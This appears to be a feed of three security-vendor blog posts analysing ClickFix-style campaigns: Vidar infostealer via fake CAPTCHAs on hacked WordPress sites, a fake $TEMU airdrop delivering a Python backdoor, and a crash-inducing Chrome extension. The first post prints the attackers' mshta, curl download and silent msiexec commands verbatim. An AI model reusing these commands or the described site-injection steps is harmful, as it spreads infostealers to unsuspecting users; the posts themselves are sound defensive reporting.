Normal view

Hacked sites deliver Vidar infostealer to Windows users

16 March 2026 at 18:15

In recent years, ClickFix and fake CAPTCHA techniques have become a popular way for cybercriminals to distribute malware. Instead of exploiting a technical vulnerability, these attacks rely on convincing people to run malicious commands themselves.

Our researchers have recently detected a campaign that ultimately delivers the Vidar infostealer, using several different infection chains.

One of the methods used in this campaign involves installing a malicious installer delivered through fake CAPTCHA pages hosted on compromised WordPress websites. We detected a number of compromised websites involved in the campaign, located in countries including Italy, France, the United States, the United Kingdom, and Brazil.

What is Vidar?

Vidar is a well-known infostealer malware family designed to harvest sensitive data from infected systems. It typically targets:

  • Browser-stored usernames and passwords
  • Cryptocurrency wallet information
  • Session cookies and authentication tokens
  • Autofill data and saved payment information
  • Files that may contain sensitive data

Because Vidar loads in memory and communicates with remote command servers, it can quietly collect and exfiltrate data without obvious signs of infection.

Fake CAPTCHA: the never-ending story

When a user visits a compromised website, they may see a screen mimicking Cloudflare’s familiar “Verifying you are human” page.

This technique has been widely used since 2024 and has evolved through numerous variations over time, both in its visual appearance and in the malicious commands that start the infection chain.

Verify you are human
The fake CAPTCHA message shown to the user.

The page instructs the visitor to copy and run a malicious command that starts the infection chain, in this case:

mshta https://{compromised website}/challenge/cf

Mshta is a legitimate Windows binary designed to execute Microsoft HTML Application (HTA). Because it is built into Windows, attackers have abused it since the early days of the ClickFix campaigns.

In this case, the command launches a simple obfuscated HTA script, which eventually downloads and installs malware associated with the Vidar infostealer.

HTA-based MSI dropper

The HTA script is the intermediate stage that downloads and runs a malicious MSI installer. An MSI is a Windows installation package normally used to install software, but attackers frequently abuse it to deliver malware.

The script performs several operations:

  • The window is resized to 0x0 and moved off-screen, making the application invisible to the user.
  • The script terminates if the document.location.href doesn’t start with http.
  • The strings are decoded using XOR and a random key.
  • Through WMI queries, the script checks for installed antivirus products.
  • It creates hidden working folders in a random folder under \AppData\Local to drop the MSI file.
  • In the end, the script downloads the malicious MSI from a compromised website. The downloaded file must be larger than 100 KB to be considered valid. Finally, it removes the :Zone.Identifier alternate data stream.
The malicious HTA script
The malicious HTA script.

In this case, the malicious MSI was downloaded using the following command:

C:\Windows\System32\curl.exe" -s -L -oC:\Users\user\AppData\Local\EdgeAgent\WebCore\cleankises.msihttps://{compromised-website}/474a2b77/5ef46f21e2.msi

Afterward, the malicious MSI was executed with:

"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\EdgeAgent\WebCore\cleankises.msi" /qn

MSI and GoLang loader

The MSI defines a CustomAction ConfigureNetFx, and it executes a GoLang loader.

Malware loaders (also known as droppers or downloaders) are common tools in the cybercrime ecosystem. Their main job is to stealthily compromise a system and then deliver one or more additional malware payloads.

In this campaign, the loader ultimately decrypts and executes the Vidar infostealer. The executable has different names in the different MSI samples analyzed.

The custom action defined in the MSI.
The custom action defined in the MSI.

The Golang loader decodes a shellcode that performs different anti-analysis checks, including:

CheckRemoteDebuggerPresent

IsDebuggerPresent

QueryPerformanceCounter

GetTickCount

After several intermediate steps, the loader decrypts and loads Vidar infostealer directly into memory.

Analysis of compromised websites

The malicious iframe injected into the compromised websites was generated by the domains cdnwoopress[.]com or woopresscdn[.]com in the analyzed cases.

The malicious iframe injected into the compromised website.
The malicious iframe injected into the compromised website.

The injected code has several functions, and the command used in the fake CAPTCHA attack is obtained from the /api/get_payload endpoint.

Code injected into the compromised websites.
Code injected into the compromised websites.

Because the malicious website was misconfigured, we were able to view the backend code injected into the compromised WordPress sites.

The injected script performs several actions:

  • Creates the file wp-cache-manager.php if it doesn’t already exist, obtaining its contents from the endpoint /api/plugin.
  • Sends a heartbeat request every hour containing the domain name, site URL, WordPress version, and status.
  • During page loads (template_redirect), the script filters visitors based on User-Agent and targets Windows desktop visitors.
  • Requests /api/inject?domain=domain from the remote command server. The response HTML is then displayed, replacing the normal WordPress page.
The malicious code injected in the compromised WordPress site.
The malicious code injected in the compromised WordPress site.

How to stay safe

Attacks like this rely on tricking people into running commands themselves, so a few simple precautions can make a big difference.

  • Slow down. If a webpage asks you to run commands on your device or copy and paste code, pause and think before following the instructions. Cybercriminals often create a sense of urgency with fake security checks, countdown timers, or warnings designed to make you act without thinking.
  • Never run commands from untrusted sources. A legitimate website should never require you to press Win+R, open Terminal, or paste commands into PowerShell just to verify you are human. If a page asks you to do this, treat it as suspicious.
  • Verify instructions independently. If a website tells you to execute a command or perform a technical action, check official documentation or contact support through trusted channels before doing anything.
  • Be cautious with copy and paste. Some attacks hide malicious commands in copied text. If you ever need to run a command from documentation, typing it manually can help reduce the risk of running hidden code.
  • Protect your device. Keep your operating system and browser updated and use security software that can block malicious websites and detect infostealer malware.
  • Stay informed. Techniques like fake CAPTCHA pages and ClickFix attacks continue to evolve. Knowing that attackers may try to trick you into running commands yourself can help you spot these scams before they succeed.

Pro tip: The free Malwarebytes Browser Guard extension can warn you if a website attempts to copy content to your clipboard, which may help prevent this type of attack.

Indicators of Compromise (IOCs)

Domains

  • cdnwoopress[.]com: Fake CAPTCHA Infrastructure
  • woopresscdn[.]com: Fake CAPTCHA Infrastructure
  • walwood[.]be: Fake CAPTCHA Infrastructure
  • telegram[.]me/dikkh0k: Vidar C2
  • telegram[.]me/pr55ii: Vidar C2
  • steamcommunity[.]com/profiles/76561198742377525: Vidar C2
  • steamcommunity[.]com/profiles/76561198735736086: Vidar C2

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Attackers impersonate Temu in ClickFix $Temu airdrop scam

13 March 2026 at 10:30

Update Friday, March 13: A Temu spokesperson contacted us to say: “Temu has not issued any cryptocurrency, token, or digital asset—including any so-called “Temu Coin.” Any airdrop, wallet claim, or cryptocurrency offer purporting to be from Temu is fraudulent and has no connection to our company.”

We’ve covered ClickFix campaigns before: the fake CAPTCHAs, the fake Windows updates, the trick of getting victims to paste malicious commands into their own machines. Now we’ve identified a campaign that uses the opening initial steps seen in ClickFix attacks, but what happens after is different enough to warrant a closer look.

It starts with a convincing fake website promoting a $TEMU airdrop, a fabricated cryptocurrency that uses the name of the well-known shopping platform TEMU. It ends with a remote-access backdoor that checks in with its operators and runs instructions streamed from the internet instead of storing them locally, making it much harder for traditional antivirus tools to detect.

Same opener, different game

Fake $TEMU Airdrop crypto site

If you’ve read our earlier coverage of ClickFix, you know the drill: a webpage that looks like a security check, instructions to press Win+R and paste something, and the user ends up executing a malicious command on their own system. 

This campaign’s lure is a polished fake website that mimics a $TEMU cryptocurrency airdrop. “Discover Exclusive $TEMU Airdrop,” it announces, complete with a logo and navigation bar designed to look like a legitimate crypto project. There is no such coin. The site exists purely to get visitors to click a fake “I’m not a robot” checkbox.

Complete these verification steps

Clicking it triggers a modal titled “Complete these Verification Steps,” which walks the victim through opening a command prompt window using Win+R, then pressing Ctrl+V to paste whatever is waiting on their clipboard and hitting Enter.

For anyone who hesitates, there is a “Video Instructions” button that expands an embedded screen recording demonstrating each keypress in sequence. It’s effectively a help-desk style tutorial guiding victims through executing the attackers’ command. At the bottom of the modal, a fake reCAPTCHA badge reads “Verification ID: 4963,” lending it the appearance of a legitimate security check. What sets this campaign apart is everything that happens after that Enter key is pressed.

First, the malware identifies the host

power

Earlier in the infection chain, the loader collects basic host information and sends it to the command server. The payload returned by the server already contains a unique identifier assigned to the victim machine. In the decoded PowerShell stage, this appears as a variable such as $machine_id, which is embedded directly in the script delivered to the infected system.

Embedding a unique identifier in the returned payload allows the attackers to track individual infections from the moment a machine first checks in. Because this identifier is inserted into the script before it reaches the victim, the server can generate slightly different payloads for different systems.

This matters more than it sounds. Security companies maintain shared databases of known-bad files. When a malicious file is identified, its fingerprint can be added to those databases within hours. If attackers generate slightly different versions of a payload for different victims, traditional file-hash-based detection becomes far less effective because there is no single file signature for defenders to block.

A windowless house guest

With the profiling done, the campaign deploys its backdoor using a bundled Python runtime. This is the same programming language used every day by millions of developers and students. It arrives self-contained, needs no administrator permissions, and does not typically appear as a traditional installed application. The version that actually runs is called pythonw.exe, where the “w” stands for “windowless.” No console, no sound, and nothing in the taskbar.

Earlier Python-based ClickFix campaigns that have been documented delivered a static Python file that performed a fixed task. This campaign appears to take a different approach. Each time the hidden process checks in with the server, it retrieves a new piece of Python code and executes it directly in memory rather than storing it as a persistent script on disk.

This architecture allows the attackers to change the malware’s behavior simply by modifying the code delivered by the server. Different victims can receive different instructions, and the functionality of the infection can be altered without updating anything already present on the compromised machine.

What they can do with an open door

Because the server can send any Python code it likes, the attackers’ capabilities are largely determined by whatever code the command server delivers. In campaigns using similar backdoors, attackers have been observed stealing browser credentials and session cookies, recording keystrokes, taking screenshots, and using the foothold to reach other machines on the same network. The campaign also included infrastructure to notify the attackers via Telegram the moment a new victim checked in—though a debug flag in the decoded payload was set to disabled, suggesting either a campaign in active development or deliberate operational caution.

Python also makes for convenient camouflage. Many corporate security systems include it on their list of trusted applications that are allowed to reach the internet without scrutiny. A Python process sending data outbound can look, at a glance, like a developer running a routine script. Detecting this type of activity typically requires behavior-based monitoring rather than file-signature scanning, making it harder to detect for most security tools.

ClickFix keeps evolving

ClickFix campaigns keep evolving because the core trick sidesteps technical defenses entirely. The victim executes the malicious command themselves.

Earlier this year we covered how attackers switched from PowerShell to nslookup after security software began detecting the original technique. This campaign tackles the same problem from a different angle: instead of changing how the malware is delivered, it tries to ensure there is no stable file left behind.

The backdoor receives instructions dynamically rather than storing them on disk, and the payload can vary for each victim. Without a consistent file to analyze, traditional file-signature detection has much less to work with.

How to stay safe

Here’s some general ClickFix advice that should help you avoid falling victim:

  • Slow down. Don’t rush to follow instructions on a webpage or prompt, especially if it asks you to run commands on your device or copy-paste code. Attackers rely on urgency to bypass your critical thinking, so be cautious of pages urging immediate action. Sophisticated ClickFix pages add countdowns, user counters, or other pressure tactics to make you act quickly.
  • Avoid running commands or scripts from untrusted sources. Never run code or commands copied from websites, emails, or messages unless you trust the source and understand the action’s purpose. Verify instructions independently. If a website tells you to execute a command or perform a technical action, check through official documentation or contact support before proceeding.
  • Limit the use of copy-paste for commands. Manually typing commands instead of copy-pasting can reduce the risk of unknowingly running malicious payloads hidden in copied text.
  • Secure your devices. Use an up-to-date, real-time anti-malware solution with a web protection component.
  • Educate yourself on evolving attack techniques. Understanding that attacks may come from unexpected vectors and evolve helps maintain vigilance. Keep reading our blog!

Pro tip: Did you know that the free Malwarebytes Browser Guard extension warns you when a website tries to copy something to your clipboard?

If you think you’ve been affected

However, if you are past that point and suspect this specific campaign, here is what to check.

  • Look inside %LOCALAPPDATA%\Programs\Python\ for a folder called Python3133 that you did not install. That is the malware’s Python runtime.
  • Open %TEMP% and look for a file called temp_settings. Its presence is the tracking marker this campaign leaves behind.
  • Open Task Manager, go to the Startup tab, and look for pythonw.exe running from an AppData or Program Files\Python3133 location.
  • Change passwords for important accounts from a clean device and revoke active sessions where possible.

Indicators of Compromise (IOCs)

Domains

• temucoin[.]lat


We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Fake extension crashes browsers to trick users into infecting themselves

20 January 2026 at 15:40

Researchers have found another method used in the spirit of ClickFix: CrashFix.

ClickFix campaigns use convincing lures—historically “Human Verification” screens—to trick the user into pasting a command from the clipboard. After fake Windows update screens, video tutorials for Mac users, and many other variants, attackers have now introduced a browser extension that crashes your browser on purpose.

Researchers found a rip-off of a well-known ad blocker and managed to get it into the official Chrome Web Store under the name “NexShield – Advanced Web Protection.” Strictly speaking, crashing the browser does provide some level of protection, but it’s not what users are typically looking for.

If users install the browser extension, it phones home to nexsnield[.]com (note the misspelling) to track installs, updates, and uninstalls. The extension uses Chrome’s built-in Alarms API (application programming interface) to wait 60 minutes before starting its malicious behavior. This delay makes it less likely that users will immediately connect the dots between the installation and the following crash.

After that pause, the extension starts a denial-of-service loop that repeatedly opens chrome.runtime port connections, exhausting the device’s resources until the browser becomes unresponsive and crashes.

After restarting the browser, users see a pop-up telling them the browser stopped abnormally—which is true but not unexpected— and offering instructions on how to prevent it from happening in the future.

It presents the user with the now classic instructions to open Win+R, press Ctrl+V, and hit Enter to “fix” the problem. This is the typical ClickFix behavior. The extension has already placed a malicious PowerShell or cmd command on the clipboard. By following the instructions, the user executes that malicious command and effetively infects their own computer.

Based on fingerprinting checks to see whether the device is domain-joined, there are currently two possible outcomes.

If the machine is joined to a domain, it is treated as a corporate device and infected with a Python remote access trojan (RAT) dubbed ModeloRAT. On non-domain-joined machines, the payload is currently unknown as the researchers received only a “TEST PAYLOAD!!!!” response. This could imply ongoing development or other fingerprinting which made the test machine unsuitable.

How to stay safe

The extension was no longer available in the Chrome Web Store at the time of writing, but it will undoubtedly resurface with an other name. So here are a few tips to stay safe:

  • If you’re looking for an ad blocker or other useful browser extensions, make sure you are installing the real deal. Cybercriminals love to impersonate trusted software.
  • Never run code or commands copied from websites, emails, or messages unless you trust the source and understand the action’s purpose. Verify instructions independently. If a website tells you to execute a command or perform a technical action, check through official documentation or contact support before proceeding.
  • Secure your devices. Use an up-to-date real-time anti-malware solution with a web protection component.
  • Educate yourself on evolving attack techniques. Understanding that attacks may come from unexpected vectors and evolve helps maintain vigilance. Keep reading our blog!

Pro tip: the free Malwarebytes Browser Guard extension is a very effective ad blocker and protects you from malicious websites. It also warns you when a website copies something to your clipboard and adds a small snippet to render any commands useless.


We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

❌